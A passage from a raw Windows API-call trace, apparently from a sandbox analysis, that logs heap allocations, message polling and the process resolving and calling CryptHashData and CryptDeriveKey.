dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ef8 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.619] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0215.620] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0215.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0215.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0215.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ae8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.622] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0215.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.622] CryptHashData (hHash=0xa87490, pbData=0x2e54e28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.623] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.623] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0215.623] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.623] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0215.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0215.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.624] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0215.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.624] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0215.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c38 [0215.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.629] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0215.629] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.629] RtlAllocateHeap 